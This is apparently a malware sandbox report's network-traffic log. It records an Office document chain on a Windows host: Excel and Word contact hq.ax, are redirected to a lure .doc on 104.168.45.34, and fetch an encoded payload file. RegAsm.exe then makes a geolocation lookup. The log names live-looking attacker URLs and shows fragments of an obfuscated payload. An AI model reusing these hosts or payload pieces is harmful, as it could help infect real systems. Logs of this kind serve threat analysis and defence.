Jul 26, 2024 13:02:48.040354013 CEST	74	OUT	GET /59/LMTS.txt HTTP/1.1 Host: 104.168.45.34 Connection: Keep-Alive
Jul 26, 2024 13:02:48.522007942 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 26 Jul 2024 06:12:52 GMT ETag: "a1000-61e2066c262fd" Accept-Ranges: bytes Content-Length: 659456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED] Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
Jul 26, 2024 13:02:48.522066116 CEST	1236	IN	Data Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34 Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
Jul 26, 2024 13:02:48.522099972 CEST	1236	IN	Data Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44 Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
Jul 26, 2024 13:02:48.522131920 CEST	1236	IN	Data Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43 Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
Jul 26, 2024 13:02:48.522166967 CEST	1236	IN	Data Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
Jul 26, 2024 13:02:48.522198915 CEST	1236	IN	Data Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64 Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
Jul 26, 2024 13:02:48.522234917 CEST	1236	IN	Data Raw: 33 44 6d 39 41 55 50 77 30 6a 4a 39 6b 52 50 50 30 44 41 38 59 4f 50 66 7a 44 32 38 45 4e 50 65 79 54 69 38 51 49 50 7a 78 54 61 38 73 45 50 76 77 54 48 38 73 77 4f 38 76 6a 67 36 6b 6e 4f 53 6c 7a 35 35 41 63 4f 62 59 6a 55 32 4d 54 4e 46 58 6a Data Ascii: 3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GAAAAbAQA4A8j8/s+Pr+DT/8hPc7T0+gsPk6jf+YnPX4zD98dPO3TI8QLPUyTZ80FPFxTO7I/OevDp7AkO1rD76MuONrTw6MqObqDk6coOxpzW6AiOVoDD
Jul 26, 2024 13:02:48.522353888 CEST	1236	IN	Data Raw: 4d 58 4f 75 6c 54 61 35 34 56 4f 43 6c 54 4c 35 6b 51 4f 45 67 7a 2f 34 51 50 4f 59 6a 44 74 34 63 49 4f 43 69 54 66 34 49 48 4f 57 68 44 54 34 34 43 4f 70 67 44 4a 34 6b 78 4e 39 66 7a 38 33 67 39 4e 54 66 6a 7a 33 4d 38 4e 6e 65 54 6e 33 49 34 Data Ascii: MXOulTa54VOClTL5kQOEgz/4QPOYjDt4cIOCiTf4IHOWhDT44COpgDJ4kxN9fz83g9NTfjz3M8NneTn3I4N9dDe302NRdzR3wyNncjI3chNkbDw2srN2azq24oNqZjN2URN9XD+1MfNoXj11QbNmWjm1sYNyVzS1MUNsUDH0AONYTzu0YLNxSDX0cFNFRjP0gDNxQzBz0+MZPT0zU8MoOjnzs3MxNDXzs0MpMzHzIxMJIz7y4tM
Jul 26, 2024 13:02:48.522386074 CEST	1236	IN	Data Raw: 4c 6a 6c 79 55 6e 4d 52 4a 6a 53 79 55 55 4d 56 48 54 47 77 6f 45 41 41 41 41 51 41 51 41 41 41 38 6a 6c 2f 45 35 50 79 35 6a 64 2b 55 6c 50 78 34 6a 4b 2b 55 53 50 34 79 44 7a 38 77 5a 4f 41 6c 6a 4e 79 63 72 4d 51 41 44 34 77 6f 4c 4d 64 43 41 Data Ascii: LjlyUnMRJjSyUUMVHTGwoEAAAAQAQAAA8jl/E5Py5jd+UlPx4jK+USP4yDz8wZOAljNycrMQAD4woLMdCAAAwCADAPAAAwPn/zy/I3PYlTG4YLOkhDY4wFOYhDV4AFOMhDS4QEOAhDP4gDOcUTYzQAAAAANAMA4AAAA2wjN4YDN2AjNsYDK2QiNgUDl1wRNYUDF1ARNMUDC1QQNAQDdzw/M4PD9zA/MsPD6zQ+MgPzVyAuMcLD2
Jul 26, 2024 13:02:48.522419930 CEST	1236	IN	Data Raw: 77 41 4d 47 41 54 41 41 41 51 41 59 41 77 41 67 42 41 41 41 38 7a 2b 2f 55 2f 50 76 2f 6a 36 2f 51 2b 50 65 2f 44 32 2f 4d 39 50 4e 2f 6a 78 2f 45 38 50 38 2b 6a 74 2f 41 37 50 71 2b 54 70 2f 38 35 50 5a 2b 7a 6b 2f 34 34 50 49 2b 6a 67 2f 77 33 Data Ascii: wAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7Pq+Tp/85PZ+zk/44PI+jg/w3P39Tc/s2Pl9DY/o1PU9jT/k0PD9TP/czPy8DL/YyPg8zG/UxPP8TC/QgP+7D++IvPt7z5+EuPb7j1+AtPK7Dx+8rP56zs+0qPo6jo+wpPW6Tk+soPF6zf+onP05Tb+YmPg1z+9QBPIyDR8cDPwwjK8QCPTsj97E+O
Jul 26, 2024 13:02:48.527225018 CEST	1236	IN	Data Raw: 70 6a 61 36 59 6d 4f 69 70 6a 55 36 30 6a 4f 72 6f 54 49 36 63 52 4f 37 6e 44 37 35 30 64 4f 57 6e 44 7a 35 49 63 4f 34 6d 6a 72 35 51 61 4f 78 6c 44 57 35 49 55 4f 70 6b 6a 49 35 59 52 4f 50 6b 44 43 34 34 4e 4f 55 6a 54 7a 34 59 4d 4f 2f 69 44 Data Ascii: pja6YmOipjU60jOroTI6cRO7nD750dOWnDz5IcO4mjr5QaOxlDW5IUOpkjI5YROPkDC44NOUjTz4YMO/iDu4QIO6hzc4sDO0gjF3o/NpDAAAAHACAIAAAQOikzG58QOIgT/4YPOujD34wMOFjTu4ILOkiTn4UJODizc4wGOghTW4sEOEhDP4oCOagzE4cAOAcj83s+NjfT038xNScDB2EvNibjr2AqNPaje2oiNdYzD1wfNtXDq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49186	178.237.33.50	80	3832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:54.476757050 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jul 26, 2024 13:02:55.651582003 CEST	1170	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 11:02:55 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
Jul 26, 2024 13:02:55.651897907 CEST	1170	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 11:02:55 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
Jul 26, 2024 13:02:55.652178049 CEST	1170	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 11:02:55 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	188.114.96.3	443	2832	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:25 UTC	315	OUT	GET /Oi8 HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: hq.ax Connection: Keep-Alive
2024-07-26 11:02:26 UTC	945	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: http://104.168.45.34/59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc x-cloud-trace-context: b67c9f19346c324e76400006261a7c5b CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQ%2FP2QMS7HoUFtbeFT7onZ%2BeCINFUy1AShFFzzfQAwUZlek1YB6UlXD0xFL5Q71EjbpT4nskJPb0F8FBYUUUG7YduX4DevpTrAKjID%2B%2Bc74bVY8WMAE8nw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5ba4a4f7ced-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:26 UTC	206	IN	Data Raw: 63 38 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 34 35 2e 33 34 2f 35 39 2f 62 6e 2f 63 72 65 61 74 65 64 67 6f 6f 64 74 68 69 6e 67 73 74 6f 67 65 74 6d 65 62 61 63 6b 74 68 65 65 6e 74 69 72 65 74 68 69 6e 67 73 69 6e 6f 6c 69 6e 65 73 77 69 74 63 68 74 6f 67 69 6c 66 72 6e 66 62 6f 6f 62 73 74 6f 75 6e 64 65 72 73 74 61 6e 64 68 6f 77 66 65 65 6c 75 72 61 72 65 69 6e 74 68 65 73 69 74 75 61 74 69 6f 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 63 72 65 61 6e 74 68 65 73 69 74 75 61 74 69 6f 6e 67 69 72 6c 66 72 6e 64 2e 64 6f 63 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: c8<a href="http://104.168.45.34/59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc">Found</a>.
2024-07-26 11:02:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	188.114.96.3	443	3100	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:29 UTC	109	OUT	HEAD /Oi8 HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: hq.ax
2024-07-26 11:02:30 UTC	758	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 11:02:30 GMT Content-Type: text/html; charset=utf-8 Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * location: https://shortify.pro x-cloud-trace-context: 3e819e761dda06bb3db6f35e8996b32c CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv%2BiffjeQhluqvAjCmvODvGB0%2Fc1jb7dRiK8MLi2sVluo4mdMJQlQpQZk6r9zJ57AH0wsiRYQDEZyKYbhaWUNGIFzqsAnQ%2B475sGxVoyIfkbCKoD7uukjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5d4e91841af-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	188.114.97.3	443	3100	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:30 UTC	113	OUT	HEAD / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: shortify.pro
2024-07-26 11:02:30 UTC	1073	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:30 GMT Content-Type: text/html; charset=utf-8 Connection: close last-modified: Thu, 25 Apr 2024 12:09:21 GMT access-control-allow-origin: * expires: Thu, 25 Jul 2024 18:19:35 GMT Cache-Control: max-age=600 x-hosts-log-append: pages_hosts_ips:{ [1] = 10.0.18.189,[2] = 10.0.3.158,[3] = 10.0.34.190,} x-proxy-cache: MISS x-github-request-id: 77A7:29F32:AED8F4:D2131C:66A294DE Age: 0 via: 1.1 varnish x-served-by: cache-lga21973-LGA x-cache: HIT x-cache-hits: 0 x-timer: S1721991751.671644,VS0,VE15 vary: Accept-Encoding x-fastly-request-id: 59e1fa01e8c0222c466c58d4188b12239122a330 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iB1GxyaMLU4zufavBLjipCNXPHK%2BwxD8OIyGvNaLVGJwKRC7wtJQADCYStrgJuQA2IV2qP5j0R1VyS3CxG01gSlEXcV3EdfC1QU4%2BPs79iprlR8Na%2BmnR14lh5rMBH4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5d99c0a4407-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.22	49169	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:02:34 UTC	122	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: hq.ax
2024-07-26 11:02:35 UTC	744	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: * access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,OPTIONS access-control-allow-origin: * x-cloud-trace-context: 71d7db1bc3ca7435fddfe3031fe7d209 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19CPf2TF%2Bf%2F3pQoOPXk79C%2Be6r2mArI7dhzvShkHI3gbtMHuuPiL4vRUd8%2BoeOLjGIGgXPbYm2a7R0ePVUw%2F2ejmn2ITsAWndXKRBQl%2FkqdplmW8RVrg%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e5f488574246-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 11:02:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.22	49170	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
